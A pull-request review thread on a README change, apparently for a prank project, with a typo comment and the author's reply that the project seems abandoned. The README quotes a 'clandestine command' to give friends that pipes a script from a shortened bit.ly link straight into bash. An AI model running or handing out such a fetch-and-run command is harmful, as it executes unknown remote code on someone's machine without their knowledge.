README.md

```diff
@@ -13,6 +13,10 @@ Here is the clandestine command you can give to your friends 😈
 
     curl -s -L http://bit.ly/10hA8iC | bash
 
+And here a slightly obfuscated version, for people who don't trust shortened links:
```

Comment:
typo, "here a" => "here is a"

Reply:
Well, I believe I initially missed a comma there: `And here, a slightly ...` but thanks :)
Either way, this project seems to be dead. So, I guess it doesn't matter anymore... 
Considering I made this PR 4 years ago.